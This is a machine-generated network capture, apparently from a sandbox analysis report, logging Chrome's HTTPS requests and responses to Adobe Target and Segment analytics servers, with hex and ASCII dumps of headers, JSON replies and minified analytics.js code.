                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:10 UTC1053OUTData Raw: 7b 22 72 65 71 75 65 73 74 49 64 22 3a 22 36 34 33 35 34 37 36 66 36 64 66 30 34 61 61 36 62 33 30 33 65 31 64 32 34 63 37 34 39 31 66 36 22 2c 22 63 6f 6e 74 65 78 74 22 3a 7b 22 75 73 65 72 41 67 65 6e 74 22 3a 22 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 33 37 2e 33 36 20 28 4b 48 54 4d 4c 2c 20 6c 69 6b 65 20 47 65 63 6b 6f 29 20 43 68 72 6f 6d 65 2f 31 31 37 2e 30 2e 30 2e 30 20 53 61 66 61 72 69 2f 35 33 37 2e 33 36 22 2c 22 63 6c 69 65 6e 74 48 69 6e 74 73 22 3a 7b 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 6c 61 74 66 6f 72 6d 22 3a 22 57 69 6e 64 6f 77 73 22 2c 22 62 72 6f 77 73 65 72 55 41 57 69 74 68 4d 61 6a 6f 72
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: {"requestId":"6435476f6df04aa6b303e1d24c7491f6","context":{"userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36","clientHints":{"mobile":false,"platform":"Windows","browserUAWithMajor
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:10 UTC1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          date: Wed, 13 Nov 2024 16:29:10 GMT
                                                                                                                                                                                                                                                                                                                                                                          content-type: application/json;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                          vary: origin,access-control-request-method,access-control-request-headers,accept-encoding
                                                                                                                                                                                                                                                                                                                                                                          access-control-allow-origin: https://mazans.com
                                                                                                                                                                                                                                                                                                                                                                          access-control-allow-credentials: true
                                                                                                                                                                                                                                                                                                                                                                          x-request-id: 3d891af8-0e1a-4fb5-a871-12118757a8e7
                                                                                                                                                                                                                                                                                                                                                                          p3p: CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
                                                                                                                                                                                                                                                                                                                                                                          set-cookie: twilio!mboxSession=ead54cbe71824480b6163d2cf14e5e54; Max-Age=1860; Expires=Wed, 13-Nov-2024 17:00:10 GMT; Domain=twilio.tt.omtrdc.net; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                          set-cookie: twilio!mboxPC=ead54cbe71824480b6163d2cf14e5e54.37_0; Max-Age=63244800; Expires=Sun, 15-Nov-2026 16:29:10 GMT; Domain=twilio.tt.omtrdc.net; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                          timing-allow-origin: *
                                                                                                                                                                                                                                                                                                                                                                          accept-ch: Sec-CH-UA, Sec-CH-UA-Arch, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                                                                                          referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                          server: jag
                                                                                                                                                                                                                                                                                                                                                                          strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                          cache-control: no-cache, no-store, max-age=0, no-transform, private
                                                                                                                                                                                                                                                                                                                                                                          x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                          x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          connection: close
                                                                                                                                                                                                                                                                                                                                                                          transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:10 UTC289INData Raw: 31 31 61 0d 0a 7b 22 73 74 61 74 75 73 22 3a 32 30 30 2c 22 72 65 71 75 65 73 74 49 64 22 3a 22 36 34 33 35 34 37 36 66 36 64 66 30 34 61 61 36 62 33 30 33 65 31 64 32 34 63 37 34 39 31 66 36 22 2c 22 63 6c 69 65 6e 74 22 3a 22 74 77 69 6c 69 6f 22 2c 22 69 64 22 3a 7b 22 74 6e 74 49 64 22 3a 22 65 61 64 35 34 63 62 65 37 31 38 32 34 34 38 30 62 36 31 36 33 64 32 63 66 31 34 65 35 65 35 34 2e 33 37 5f 30 22 7d 2c 22 65 64 67 65 48 6f 73 74 22 3a 22 6d 62 6f 78 65 64 67 65 33 37 2e 74 74 2e 6f 6d 74 72 64 63 2e 6e 65 74 22 2c 22 70 72 65 66 65 74 63 68 22 3a 7b 7d 2c 22 74 65 6c 65 6d 65 74 72 79 53 65 72 76 65 72 54 6f 6b 65 6e 22 3a 22 47 52 67 64 4e 50 4b 46 32 62 61 78 63 52 48 41 51 71 41 48 71 31 4c 52 4c 53 6f 39 52 44 65 6b 66 69 4a 6c 4c 6c 65 49
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 11a{"status":200,"requestId":"6435476f6df04aa6b303e1d24c7491f6","client":"twilio","id":{"tntId":"ead54cbe71824480b6163d2cf14e5e54.37_0"},"edgeHost":"mboxedge37.tt.omtrdc.net","prefetch":{},"telemetryServerToken":"GRgdNPKF2baxcRHAQqAHq1LRLSo9RDekfiJlLleI
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          26192.168.2.174980099.86.8.1754436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:10 UTC574OUTGET /analytics.js/v1/1CjnBNPybWzyv10ssZRxdwmb8vrYF4yj/analytics.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: cdn.segment.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:11 UTC741INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 105589
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                                                                                                                                          x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Mon, 29 Jul 2024 20:07:04 GMT
                                                                                                                                                                                                                                                                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                          x-amz-version-id: uK1E2D6uYmQ2VcCu3HXELM3zdpmI61Pm
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Server: AmazonS3
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:12 GMT
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=120
                                                                                                                                                                                                                                                                                                                                                                          ETag: "06e7811332c76cc2b35da692acd1f134"
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 d8e97d2c28917e4c41ab79bb1e94b844.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: FRA6-C1
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: SqTUPAIaPvPD8atGCf315Y4ml1axy9-qNzh-QrvfdpOwHThU34lE8A==
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:11 UTC16384INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 2c 65 2c 6e 2c 72 2c 69 3d 7b 38 38 37 38 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 74 68 69 73 26 26 74 68 69 73 2e 5f 5f 69 6d 70 6f 72 74 44 65 66 61 75 6c 74 7c 7c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 26 26 74 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 74 3a 7b 64 65 66 61 75 6c 74 3a 74 7d 7d 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 3b 76 61 72 20 69 3d 72 28 6e 28 33 32 35 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 74 68 69 73 2e
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: !function(){var t,e,n,r,i={8878:function(t,e,n){"use strict";var r=this&&this.__importDefault||function(t){return t&&t.__esModule?t:{default:t}};Object.defineProperty(e,"__esModule",{value:!0});var i=r(n(325));function o(t,e){return function(){var n=this.
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:11 UTC16384INData Raw: 2e 69 73 41 72 72 61 79 28 74 29 3f 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 74 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 72 29 7b 74 5b 72 5d 3d 69 28 6e 2c 65 29 7d 29 29 2c 74 7d 28 74 2c 65 29 3a 72 2e 69 73 28 74 2c 65 29 3f 72 2e 70 61 72 73 65 28 74 29 3a 74 7d 74 2e 65 78 70 6f 72 74 73 3d 69 7d 2c 38 32 36 34 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6e 3d 2f 5e 28 5c 64 7b 34 7d 29 28 3f 3a 2d 3f 28 5c 64 7b 32 7d 29 28 3f 3a 2d 3f 28 5c 64 7b 32 7d 29 29 3f 29 3f 28 3f 3a 28 5b 20 54 5d 29 28 5c 64 7b 32 7d 29 3a 3f 28 5c 64 7b 32 7d 29 28 3f 3a 3a 3f 28 5c 64 7b 32 7d 29 28 3f 3a 5b 2c 5c 2e 5d 28 5c 64 7b 31 2c 7d 29 29 3f 29 3f 28 3f 3a 28 5a 29
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: .isArray(t)?function(t,e){return t.forEach((function(n,r){t[r]=i(n,e)})),t}(t,e):r.is(t,e)?r.parse(t):t}t.exports=i},8264:function(t,e){"use strict";var n=/^(\d{4})(?:-?(\d{2})(?:-?(\d{2}))?)?(?:([ T])(\d{2}):?(\d{2})(?::?(\d{2})(?:[,\.](\d{1,}))?)?(?:(Z)
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:11 UTC3028INData Raw: 70 73 3a 5b 5d 7d 3b 72 65 74 75 72 6e 20 6f 3d 7b 6e 65 78 74 3a 75 28 30 29 2c 74 68 72 6f 77 3a 75 28 31 29 2c 72 65 74 75 72 6e 3a 75 28 32 29 7d 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 28 6f 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 7d 29 2c 6f 3b 66 75 6e 63 74 69 6f 6e 20 75 28 75 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 75 29 7b 69 66 28 6e 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 6f 26 26 28 6f 3d 30 2c 75 5b 30 5d 26
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ps:[]};return o={next:u(0),throw:u(1),return:u(2)},"function"==typeof Symbol&&(o[Symbol.iterator]=function(){return this}),o;function u(u){return function(a){return function(u){if(n)throw new TypeError("Generator is already executing.");for(;o&&(o=0,u[0]&
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:11 UTC16384INData Raw: 29 7b 76 6f 69 64 20 30 3d 3d 3d 65 26 26 28 65 3d 28 30 2c 72 2e 76 34 29 28 29 29 2c 76 6f 69 64 20 30 3d 3d 3d 6e 26 26 28 6e 3d 6e 65 77 20 75 2e 69 29 2c 76 6f 69 64 20 30 3d 3d 3d 69 26 26 28 69 3d 6e 65 77 20 73 29 2c 74 68 69 73 2e 61 74 74 65 6d 70 74 73 3d 30 2c 74 68 69 73 2e 65 76 65 6e 74 3d 74 2c 74 68 69 73 2e 5f 69 64 3d 65 2c 74 68 69 73 2e 6c 6f 67 67 65 72 3d 69 2c 74 68 69 73 2e 73 74 61 74 73 3d 6e 7d 72 65 74 75 72 6e 20 74 2e 73 79 73 74 65 6d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 69 73 53 61 6d 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 2e 69 64 3d 3d 3d 74 68 69 73 2e 69 64 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 63 61 6e 63 65 6c 3d 66 75 6e 63 74 69 6f 6e 28 74 29
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ){void 0===e&&(e=(0,r.v4)()),void 0===n&&(n=new u.i),void 0===i&&(i=new s),this.attempts=0,this.event=t,this._id=e,this.logger=i,this.stats=n}return t.system=function(){},t.prototype.isSame=function(t){return t.id===this.id},t.prototype.cancel=function(t)
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:11 UTC11308INData Raw: 6e 74 69 66 79 22 2c 75 73 65 72 49 64 3a 65 2c 74 72 61 69 74 73 3a 6e 75 6c 6c 21 3d 6e 3f 6e 3a 7b 7d 2c 6f 70 74 69 6f 6e 73 3a 28 30 2c 74 2e 70 69 29 28 7b 7d 2c 72 29 2c 69 6e 74 65 67 72 61 74 69 6f 6e 73 3a 69 7d 29 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 67 72 6f 75 70 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 2c 69 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 6f 6e 45 76 65 6e 74 4d 65 74 68 6f 64 43 61 6c 6c 28 7b 74 79 70 65 3a 22 67 72 6f 75 70 22 2c 6f 70 74 69 6f 6e 73 3a 72 7d 29 2c 74 68 69 73 2e 6e 6f 72 6d 61 6c 69 7a 65 28 28 30 2c 74 2e 70 69 29 28 28 30 2c 74 2e 70 69 29 28 7b 7d 2c 74 68 69 73 2e 62 61 73 65 45 76 65 6e 74 28 29 29 2c 7b 74 79 70 65 3a 22 67 72 6f 75 70 22 2c 74 72 61 69 74 73 3a 6e
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ntify",userId:e,traits:null!=n?n:{},options:(0,t.pi)({},r),integrations:i}))},e.prototype.group=function(e,n,r,i){return this.settings.onEventMethodCall({type:"group",options:r}),this.normalize((0,t.pi)((0,t.pi)({},this.baseEvent()),{type:"group",traits:n
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:11 UTC16384INData Raw: 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 7b 73 65 74 3a 72 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 26 26 28 21 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 7c 7c 74 29 29 7b 66 6f 72 28 76 61 72 20 6e 3d 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3f 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e 73 70 6c 69 74 28 22 3b 20 22 29 3a 5b 5d 2c 72 3d 7b 7d 2c 69 3d 30 3b 69 3c 6e 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 7b 76 61 72 20 6f 3d 6e 5b 69 5d 2e 73 70 6c 69 74 28 22 3d 22 29 2c 73 3d 6f 2e 73 6c 69 63 65 28 31 29 2e 6a 6f 69 6e 28 22 3d 22 29 3b 74 72 79 7b 76 61 72 20 75 3d 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: eturn Object.create({set:r,get:function(t){if("undefined"!=typeof document&&(!arguments.length||t)){for(var n=document.cookie?document.cookie.split("; "):[],r={},i=0;i<n.length;i++){var o=n[i].split("="),s=o.slice(1).join("=");try{var u=decodeURIComponent
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:12 UTC16384INData Raw: 28 73 2c 31 39 35 36 29 29 5d 3b 63 61 73 65 20 31 3a 72 65 74 75 72 6e 20 6e 3d 69 2e 73 65 6e 74 28 29 2c 5b 32 2c 28 72 3d 6e 2e 66 6f 72 6d 29 2e 63 61 6c 6c 2e 61 70 70 6c 79 28 72 2c 28 30 2c 74 2e 65 76 29 28 5b 74 68 69 73 5d 2c 65 2c 21 31 29 29 5d 7d 7d 29 29 7d 29 29 7d 2c 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 67 69 73 74 65 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 6e 3d 30 3b 6e 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 65 5b 6e 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 3b 72 65 74 75 72 6e 28 30 2c 74 2e 6d 47 29 28 74 68 69 73 2c 76 6f 69 64 20 30 2c 50 72 6f 6d 69 73 65 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 72 2c 69 3d 74 68 69 73 3b 72 65 74 75 72 6e 28 30
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: (s,1956))];case 1:return n=i.sent(),[2,(r=n.form).call.apply(r,(0,t.ev)([this],e,!1))]}}))}))},n.prototype.register=function(){for(var e=[],n=0;n<arguments.length;n++)e[n]=arguments[n];return(0,t.mG)(this,void 0,Promise,(function(){var n,r,i=this;return(0
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:12 UTC9333INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 28 30 2c 66 2e 73 29 28 29 3f 28 6c 2e 70 75 73 68 28 69 29 2c 4b 74 28 64 2c 6c 2c 77 2c 4b 74 29 2c 5b 32 2c 69 5d 29 3a 28 70 2e 61 64 64 28 69 29 2c 6f 3d 69 2e 65 76 65 6e 74 2e 74 79 70 65 2e 63 68 61 72 41 74 28 30 29 2c 73 3d 28 30 2c 4e 74 2e 44 29 28 69 2e 65 76 65 6e 74 29 2e 6a 73 6f 6e 28 29 2c 22 74 72 61 63 6b 22 3d 3d 3d 69 2e 65 76 65 6e 74 2e 74 79 70 65 26 26 64 65 6c 65 74 65 20 73 2e 74 72 61 69 74 73 2c 22 61 6c 69 61 73 22 3d 3d 3d 69 2e 65 76 65 6e 74 2e 74 79 70 65 26 26 28 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 2c 73 3d 74 2e 75 73 65 72 28 29 3b 72 65 74 75 72 6e 20 65 2e 70 72 65 76 69 6f 75 73 49 64 3d 6e 75 6c 6c 21 3d 3d 28 69
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: (function(t){return(0,f.s)()?(l.push(i),Kt(d,l,w,Kt),[2,i]):(p.add(i),o=i.event.type.charAt(0),s=(0,Nt.D)(i.event).json(),"track"===i.event.type&&delete s.traits,"alias"===i.event.type&&(s=function(t,e){var n,r,i,o,s=t.user();return e.previousId=null!==(i


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          27192.168.2.174980199.86.8.1754436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:10 UTC396OUTGET /v1/projects/1CjnBNPybWzyv10ssZRxdwmb8vrYF4yj/integrations HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: cdn.segment.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:11 UTC742INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 209
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                                                                                                                                          x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Wed, 27 Sep 2023 22:08:44 GMT
                                                                                                                                                                                                                                                                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                          x-amz-version-id: AR3j4nv9gmDoXsLRJnYBTq9hmL_suUNt
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Server: AmazonS3
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:10 GMT
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=10800
                                                                                                                                                                                                                                                                                                                                                                          ETag: "3d88ed31cd70c5846f109168d704c76a"
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 a0a81637cc76d6981e4e29044a73b7f6.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: FRA6-C1
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: VAbRk6eGYSF2dIpqWNNQyaXLQb1o9UgCcZAsTJY_ku2B0jJ27_9KvA==
                                                                                                                                                                                                                                                                                                                                                                          Age: 2
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:11 UTC209INData Raw: 5b 7b 22 6e 61 6d 65 22 3a 22 52 65 70 65 61 74 65 72 22 2c 22 63 72 65 61 74 69 6f 6e 4e 61 6d 65 22 3a 22 52 65 70 65 61 74 65 72 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 68 65 20 53 65 67 6d 65 6e 74 20 72 65 70 65 61 74 65 72 20 69 6e 74 65 67 72 61 74 69 6f 6e 20 72 65 70 65 61 74 73 20 61 20 73 6f 75 72 63 65 20 73 74 72 65 61 6d 20 74 6f 20 6f 6e 65 20 6f 72 20 6d 75 6c 74 69 70 6c 65 20 6f 74 68 65 72 20 73 6f 75 72 63 65 73 2e 20 22 2c 22 77 65 62 73 69 74 65 22 3a 22 68 74 74 70 73 3a 2f 2f 73 65 67 6d 65 6e 74 2e 63 6f 6d 22 2c 22 63 61 74 65 67 6f 72 79 22 3a 22 52 61 77 20 44 61 74 61 22 7d 5d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: [{"name":"Repeater","creationName":"Repeater","description":"The Segment repeater integration repeats a source stream to one or multiple other sources. ","website":"https://segment.com","category":"Raw Data"}]


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          28192.168.2.174980466.235.152.2214436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:11 UTC546OUTGET /rest/v1/delivery?client=twilio&sessionId=ead54cbe71824480b6163d2cf14e5e54&version=2.11.4 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: twilio.tt.omtrdc.net
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: twilio!mboxSession=ead54cbe71824480b6163d2cf14e5e54; twilio!mboxPC=ead54cbe71824480b6163d2cf14e5e54.37_0
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:12 UTC450INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                                                                                                                                                                          date: Wed, 13 Nov 2024 16:29:11 GMT
                                                                                                                                                                                                                                                                                                                                                                          content-type: application/json;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                                                                                                                                          referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                          server: jag
                                                                                                                                                                                                                                                                                                                                                                          strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                          cache-control: no-cache, no-store, max-age=0, no-transform, private
                                                                                                                                                                                                                                                                                                                                                                          x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                          x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          connection: close
                                                                                                                                                                                                                                                                                                                                                                          transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:12 UTC67INData Raw: 33 64 0d 0a 7b 22 73 74 61 74 75 73 22 3a 34 30 35 2c 22 6d 65 73 73 61 67 65 22 3a 22 52 65 71 75 65 73 74 20 6d 65 74 68 6f 64 20 27 47 45 54 27 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 22 7d 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 3d{"status":405,"message":"Request method 'GET' not supported"}
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 0


